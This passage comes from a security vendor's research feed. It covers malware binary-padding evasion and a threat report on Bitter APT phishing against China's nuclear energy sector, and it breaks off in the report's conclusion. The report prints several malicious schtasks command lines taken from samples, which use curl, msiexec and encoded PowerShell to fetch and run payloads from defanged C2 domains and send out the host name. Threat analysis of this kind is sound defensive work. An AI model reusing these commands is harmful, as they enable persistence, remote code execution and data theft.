hYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWE"target="_blank" rel="noopener"&gt;Entropy&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;File 2 (More Entropy/Smaller File):
&lt;a href="https://gchq.github.io/CyberChef/#recipe=Raw_Deflate%28%27Dynamic%20Huffman%20Coding%27%29&amp;amp;input=YWFiYmNjZGRlZWZmZ2doaGlpampra2xsbW1ubm9vcHBxcXJyc3N0dHV1dnZ3d3h4eXl6eg"target="_blank" rel="noopener"&gt;Compression&lt;/a&gt;,
&lt;a href="https://gchq.github.io/CyberChef/#recipe=Entropy%28%27Shannon%20scale%27%29&amp;amp;input=YWFiYmNjZGRlZWZmZ2doaGlpampra2xsbW1ubm9vcHBxcXJyc3N0dHV1dnZ3d3h4eXl6eg"target="_blank" rel="noopener"&gt;Entropy&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Compression likes lower entropy. Entropy is a measure of how random the data
inside a file is. Since compression algorithms work by finding patterns to
encode in a smaller format, a smaller entropy of data in a file will lead to
better compression ratios.&lt;/p&gt;
&lt;p&gt;What does this look like incorporated into malware?&lt;/p&gt;
&lt;h3&gt;Examples of Malware with Binary Padding&lt;span class="hx:absolute hx:-mt-20" id="examples-of-malware-with-binary-padding"&gt;&lt;/span&gt;
&lt;a href="#examples-of-malware-with-binary-padding" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Overlay&lt;span class="hx:absolute hx:-mt-20" id="overlay"&gt;&lt;/span&gt;
&lt;a href="#overlay" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;In March 2023, a Trend Micro
&lt;a href="https://www.trendmicro.com/en_us/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html"target="_blank" rel="noopener"&gt;blog&lt;/a&gt;
noted Emotet using binary padding in the overlay in order to inflate the file
size. Using 00-byte padding allowed the PE file to be compressed from a sizes
of over 500 MB to ZIP files less than 1 MB:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://analyze.intezer.com/files/61bb1c8adaaffc629e60db7e4a171538c5d625a6d79d225e03310c684efd7581"target="_blank" rel="noopener"&gt;61bb1c8adaaffc629e60db7e4a171538c5d625a6d79d225e03310c684efd7581&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This file contains a very large DLL inside with padding in the overlay. The
sections end at the file end at &lt;code&gt;0x9a200&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig5.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Junk data is appended past the defined end of the PE. Most of it being the null
byte.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig6.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;99.9% of the file is padding. The padding in the overlay is not loaded to
memory when the PE is executed. This allows it to take up less space in memory
than it does on disk.&lt;/p&gt;
&lt;h4&gt;Resources&lt;span class="hx:absolute hx:-mt-20" id="resources"&gt;&lt;/span&gt;
&lt;a href="#resources" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The resource section of a PE is used for many items that are used as resources
by the binary, this can be things such as images, audio, icons, and videos, but
it can be abused. Very commonly the padding is placed in the resource section
of malware. An example of this being used is in phishing emails, sending ZIP
files that contain a Windows Installer (MSI) file:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://analyze.intezer.com/files/34bcf0a864b6c7f4ecca92f1216ed58da4018c719552cfb62fee940924a91154"target="_blank" rel="noopener"&gt;34bcf0a864b6c7f4ecca92f1216ed58da4018c719552cfb62fee940924a91154&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The MSI file is in Composite Document File V2 Document (CDF) format with an
embedded DLL file that is padded using the resource section. The use of the CDF
format also adds another layer of defense evasion that might bypass security
detections that only work on PE files. The DLL is padded in the resource
section with a stream of repeating bytes.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig7.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The MSI file is almost 500 MB but is able to be compressed to a size of around
2 MB, a huge reduction in size.&lt;/p&gt;
&lt;h4&gt;Space Between Sections&lt;span class="hx:absolute hx:-mt-20" id="space-between-sections"&gt;&lt;/span&gt;
&lt;a href="#space-between-sections" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Similar to the overlay, malware authors can also play with the space between
sections. Data can be inserted in between the sections of a PE to inflate the
size.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig8.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;This technique has
&lt;a href="https://github.com/adeilsonsilva/malware-injection"target="_blank" rel="noopener"&gt;been used by researchers&lt;/a&gt;
in order to deceive malware classification.&lt;/p&gt;
&lt;h4&gt;Giant Variable&lt;span class="hx:absolute hx:-mt-20" id="giant-variable"&gt;&lt;/span&gt;
&lt;a href="#giant-variable" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Malware authors can also use really large strings in order to pad malware in
the data section. This technique is not often used as it can be easily
detected, through looking for large strings. This technique involves simply
creating extremely large strings in the code of the malware that are not used
specifically for the functionality of the malware itself. An example can be
easily shown with a simple C program printing out very large strings.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig9.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;These strings are stored in the data section of the PE. Since they are just
sequences of repeating characters, they have very little entropy, and can help
with compression. The graph below shows the drop in entropy of where these
strings are stored. One issue that a threat actor might stumble into with this
technique is that depending on the compiler, there can be a limit on the
&lt;a href="https://learn.microsoft.com/en-us/cpp/cpp/string-and-character-literals-cpp?redirectedfrom=MSDN&amp;amp;view=msvc-170#size-of-string-literals"target="_blank" rel="noopener"&gt;maximum length&lt;/a&gt;
of a string literal. This could force the threat actor to use many smaller
strings instead of one massive string for padding.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig10.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Compressing this file in ZIP format will lead to a 64% deflation size.&lt;/p&gt;
&lt;h3&gt;How Intezer Fights Binary Padding&lt;span class="hx:absolute hx:-mt-20" id="how-intezer-fights-binary-padding"&gt;&lt;/span&gt;
&lt;a href="#how-intezer-fights-binary-padding" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Binary padding can be a simple and effective way to bypass security defenses,
it is one technique out of many that are in a malware authors arsenal. This
technique combined with other techniques, such as compression, can be chained
to create innovative payloads that hinder analysis and detection.&lt;/p&gt;
&lt;p&gt;Intezer is able to remove padding from samples to make it much more manageable
to analyze. Take for example this
&lt;a href="https://www.virustotal.com/gui/file/d5e5621de806e1bbe724ddd9791e6e4d1a0a68b6194cdafa18aeaf6b09fd9237/detection"target="_blank" rel="noopener"&gt;Laplas Clipper&lt;/a&gt;
sample. It is padded to over 600 MB through using the overlay technique!
Intezer is able to
&lt;a href="https://analyze.intezer.com/files/dee4b71196dd36a2f350c1aaaea795d2242372bda7157f3bc37d76c17d7cc407"target="_blank" rel="noopener"&gt;unpack the sample&lt;/a&gt;
from the ZIP file and remove the overlay. Give it a go yourself with padded
samples. Submit the parent ZIP and Intezer will do the rest.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig11.png" alt="" loading="lazy" /&gt;&lt;/p&gt;</description></item><item><title>Phishing Campaign Targets Chinese Nuclear Energy Industry</title><link>https://research.intezer.com/blog/2023/03/phishing-campaign-targets-nuclear-energy-industry/</link><pubDate>Fri, 24 Mar 2023 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2023/03/phishing-campaign-targets-nuclear-energy-industry/</guid><description>
&lt;p&gt;Intezer has been tracking activity targeting the energy sector and noted a
campaign with techniques that align with those of
&lt;a href="https://analyze.intezer.com/families/3b992ec8-b6b1-4ea4-a958-b5fca45f31bd?tab=detect"target="_blank" rel="noopener"&gt;Bitter APT&lt;/a&gt;,
operating in the Asia-Pacific region.&lt;/p&gt;
&lt;p&gt;We have made the connection to Bitter APT through tactics, techniques, and
procedures (TTPs) that have been observed in other publications, such as the
use of Microsoft Office exploits through
&lt;a href="https://blog.talosintelligence.com/bitter-apt-adds-bangladesh-to-their/"target="_blank" rel="noopener"&gt;Excel files&lt;/a&gt;,
and the use of CHM and
&lt;a href="https://www.antiy.cn/research/notice&amp;amp;report/research_report/20210705.html"target="_blank" rel="noopener"&gt;Windows Installer (MSI) files&lt;/a&gt;.
Bitter APT is a South Asian threat group that commonly targets energy and
government sectors; they have been
&lt;a href="https://attack.mitre.org/groups/G1002/"target="_blank" rel="noopener"&gt;known to target&lt;/a&gt; Pakistan, China,
Bangladesh, and Saudi Arabia.&lt;/p&gt;
&lt;p&gt;Bitter APT are continuing to target organizations in China in an espionage
campaign, as our here research shows. For some of the payloads we have
corresponding phishing emails that were used as lures to deliver the files,
allowing analysis of the social engineering techniques used. &lt;strong&gt;We have noted
updates to the first-stage payloads used, with new layers of obfuscation to
hinder analysis and additional decoys used for social engineering&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;Analysis of Phishing Lures and Payloads&lt;span class="hx:absolute hx:-mt-20" id="analysis-of-phishing-lures-and-payloads"&gt;&lt;/span&gt;
&lt;a href="#analysis-of-phishing-lures-and-payloads" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;We identified seven emails pretending to be from the Embassy of Kyrgyzstan,
being sent to recipients in the nuclear energy industry in China. In some
emails, people and entities in academia are also targeted, also related to
nuclear energy. The phishing emails contain a lure that invites the recipients
to join conferences on subjects that are relevant to them. The lures are
designed to socially engineer the recipient to download and open an attached
RAR file that contains either a Microsoft Compiled HTML Help (CHM) or Excel
payload. This activity appears to be a continuation of the tactics and campaign
that Bitter APT have been using since
&lt;a href="https://www.antiy.cn/research/notice&amp;amp;report/research_report/20210705.html"target="_blank" rel="noopener"&gt;at least 2021&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/03/phishing-campaign-targets-nuclear-energy-industry/images/fig1.png" title="Figure 1: Attack flow described in this research" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 1: Attack flow described in this research&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Social Engineering with Phishing Emails&lt;span class="hx:absolute hx:-mt-20" id="social-engineering-with-phishing-emails"&gt;&lt;/span&gt;
&lt;a href="#social-engineering-with-phishing-emails" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The emails contain a number of social engineering techniques. The name and
email address used to send the phishing emails is crafted to look like it is
coming from an &amp;ldquo;Embassy in Beijing.&amp;rdquo; A free email provider is used, therefore
domain reputation checks will not be useful.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/03/phishing-campaign-targets-nuclear-energy-industry/images/fig2.png" title="Figure 2: Name crafted to appear as communication from an embassy" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 2: Name crafted to appear as communication from an embassy&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The email is signed off with the name and details of an actual attaché of the
Kyrgyz embassy in China. If the recipient were to use a search engine to check
for this employee, they would easily be able to find corroborating information
from LinkedIn and the Ministry of Foreign Affairs website for Kyrgyzstan,
adding to the supposed legitimacy of the email. This is presumably also how the
malicious actor was able to get information in order to craft the lure.&lt;/p&gt;
&lt;p&gt;The email subject and body use terms and themes that would be familiar with the
recipients in governmental and energy sectors, such as International Atomic
Energy Agency (IAEA), China Institute of International Studies (CIIS),
strategic alliances, and nuclear doctrines.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/03/phishing-campaign-targets-nuclear-energy-industry/images/fig3.png" title="Figure 3: Email body lure with nuclear themes" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 3: Email body lure with nuclear themes&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Malicious Payloads via CHM and Microsoft Excel Files&lt;span class="hx:absolute hx:-mt-20" id="malicious-payloads-via-chm-and-microsoft-excel-files"&gt;&lt;/span&gt;
&lt;a href="#malicious-payloads-via-chm-and-microsoft-excel-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Multiple payloads have been observed being delivered. Either CHM files, or
Microsoft Excel files with Equation Editor exploits. These payloads are
compressed inside RAR files, this helps avoid static analysis techniques that
do not decompress the files first. The purpose of the payloads are to create
persistence and download further malware payloads. We were not able to get
further additional payloads from the command and control (C2) servers, but in
some instances were able to get the file names of next stages from active C2s.&lt;/p&gt;
&lt;h2&gt;Malicious Microsoft Excel Files&lt;span class="hx:absolute hx:-mt-20" id="malicious-microsoft-excel-files"&gt;&lt;/span&gt;
&lt;a href="#malicious-microsoft-excel-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The Excel
&lt;a href="https://analyze.intezer.com/files/07504fcef717e6b74ed381e94eab5a9140171572b5572cda87b275e3873c8a88"target="_blank" rel="noopener"&gt;payloads&lt;/a&gt;
simply contain an Equation Editor exploit that creates two different
&lt;a href="https://intezer.com/blog/incident-response/infected-endpoint-scan-result/#:~:text=has%20created%20a-,scheduled%20task,-%2C%20which%20we%20can"target="_blank" rel="noopener"&gt;scheduled tasks&lt;/a&gt;.
There is no decoy in the document. One scheduled task (shown below) runs every
15 minutes, to download a next stage EXE payload using cURL, also sending the
actor the name of the infected machine. These tactics have been observed being
used by Bitter APT in
&lt;a href="https://blog.talosintelligence.com/bitter-apt-adds-bangladesh-to-their/"target="_blank" rel="noopener"&gt;2021/2022&lt;/a&gt;.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;&amp;#34;C:WindowsSystem32schtasks.exe&amp;#34; /create /sc MINUTE /mo 15 /TN WindowsDWMDWMCORE /TR &amp;#34;cmd /c start /min curl --output %AppData%dwmcor.exe -O &amp;#34;&amp;#34;https://qwavemediaservice[.]net/hkcu/qt.php/?dt=%computername%-QT-2&amp;amp;ct=QT&amp;#34;&amp;#34;&amp;#34; /f&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="images/fig4" title="Figure 4: Scheduled task" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 4: Scheduled task&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The second scheduled task created attempts to execute the payload downloaded by
the other task:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;&amp;#34;C:\Windows\System32\schtasks.exe&amp;#34; /create /sc MINUTE /mo 20 /TN WindowsDWMDWMCORELIB /TR &amp;#34;%AppData%dwmcor.exe&amp;#34; /f&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;CHM Files&lt;span class="hx:absolute hx:-mt-20" id="chm-files"&gt;&lt;/span&gt;
&lt;a href="#chm-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The more common payloads contained within the RAR files are Microsoft Compiled
HTML Help (CHM) files. These can be used to simply execute arbitrary code, in
these cases, they are also used to create scheduled tasks for persistence and
downloading of the next stage. We have noted multiple versions of these CHM
payloads. CHM payloads are useful for the actor as it requires a low amount of
user interaction, it does not require a vulnerable version of Microsoft Office
installed like the Excel files, and it also uses LZX compression that will
bypass static malware analysis solutions that do not decompress the file.&lt;/p&gt;
&lt;p&gt;The
&lt;a href="https://analyze.intezer.com/files/06b4c1f46845cee123b2200324a3ebb7fdbea8e2c6ef4135e3f943bd546a2431/behavior"target="_blank" rel="noopener"&gt;first version&lt;/a&gt;
of the CHM file will create a scheduled task that will use the living off the
land binary
&lt;a href="https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"target="_blank" rel="noopener"&gt;msiexec&lt;/a&gt; to execute
a remote MSI payload from the C2. String concatenation is used to break up the
string for obfuscation. The computer name and the username is also sent to the
C2.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;&amp;#34;C:\Windows\System32\schtasks.exe&amp;#34; /create /sc minute /mo 15 /tn AdobeUpdater /tr &amp;#34;%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i htt^p:/^/mirz^adih^atti^[.]com^/cs^s/t^ry.php?h=%computername%*%username% /^q^n ^/^norestart&amp;#34; /ft&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;We did not fetch any additional payloads from the C2, but we were served empty
MSI files, allowing us to discover the names of the next stage payloads.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="images/fig5" title="Figure 5: Empty payloads served from different C2 servers" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 5: Empty payloads served from different C2 servers&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This may allow the actor to examine the server logs of beaconing infected
machines before deciding whether to swap out the empty file with an actual
payload if the target looks promising enough, thus protecting the next stage of
the attack. Bitter APT do not appear to change their tactics too much,
therefore we can assume that the payloads will be similar to those
&lt;a href="https://www.antiy.cn/research/notice&amp;amp;report/research_report/20210705.html"target="_blank" rel="noopener"&gt;observed&lt;/a&gt;
in 2021, executing a downloader module that can be served with plugins such as
a keylogger, remote access tool, file stealer, or browser credential stealer.&lt;/p&gt;
&lt;p&gt;The
&lt;a href="https://analyze.intezer.com/files/ded0635c5ef9c3d63543abc36a69b1176875dba84ca005999986bd655da3a446/genetic-analysis"target="_blank" rel="noopener"&gt;second version&lt;/a&gt;
of the CHM payload abstracts the same activity through an encoded PowerShell
command stage, obfuscating the activity further than just simple string
concatenation.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/03/phishing-campaign-targets-nuclear-energy-industry/images/fig6.png" title="Figure 6: Encoded PowerShell command in version 2 of the CHM files" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 6: Encoded PowerShell command in version 2 of the CHM files&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The decoded command is the following:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;schtasks /create /tn WinSecurity /sc minute /mo 15 /tr &amp;#34;powershell.exe -WindowStyle Hidden -command curl -o %LOCALAPPDATA%pic.jpg https://coauthcn[.]com/hbz.php?id=%computername%;timeout 9;more %LOCALAPPDATA%pic.jpg|powershell;timeout 9;del %LOCALAPPDATA%pic.jpg&amp;#34; /f&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;It is evident that the C2 controllers have been updated also as now only the
computer name is sent to the C2 and not the username. What is interesting about
the next version is that it now contains a decoy picture when opened:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/03/phishing-campaign-targets-nuclear-energy-industry/images/fig7.png" title="Figure 7: Decoy picture" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 7: Decoy picture&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The decoy appears to reference the United Front Work Department of the Central
Committee of the Chinese Communist Party. The following is a machine translated
version of the same picture for reference (please note that the translation
will not be fully accurate and should be used for reference purposes only):&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/03/phishing-campaign-targets-nuclear-energy-industry/images/fig8.jpg" title="Figure 8: Machine translated version of the decoy" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 8: Machine translated version of the decoy&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Bitter APT have been conducting espionage campaigns for years using many
tactics, including phishing, to achieve their goals. It is advised that
entities in government, energy, and engineering especially those in the
Asia-Pacific region should remain vigilant when receiving emails, especially
